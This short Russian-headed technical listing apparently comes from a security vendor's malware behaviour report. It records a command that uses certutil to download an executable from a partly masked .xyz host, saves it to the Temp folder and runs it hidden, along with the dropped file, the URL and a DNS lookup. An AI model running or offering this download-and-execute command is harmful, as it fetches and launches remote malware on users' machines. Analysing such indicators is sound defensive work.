Техническая информация
- '<SYSTEM32>\cmd.exe' /ccertutil.exe -urlcache -split -f "http://de#.##me.xyz:2095/sting/pwcore.exe" %LOCALAPPDATA%\Temp/t.exe && %LOCALAPPDATA%\Temp/t.exe
- %TEMP%\t.exe
- http://de#.##me.xyz:2095/sting/pwcore.exe via de#.#ime.xyz
- DNS ASK de#.#ime.xyz
- '<SYSTEM32>\cmd.exe' /ccertutil.exe -urlcache -split -f "http://de#.##me.xyz:2095/sting/pwcore.exe" %LOCALAPPDATA%\Temp/t.exe && %LOCALAPPDATA%\Temp/t.exe' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f "http://de#.##me.xyz:2095/sting/pwcore.exe" %LOCALAPPDATA%\Temp/t.exe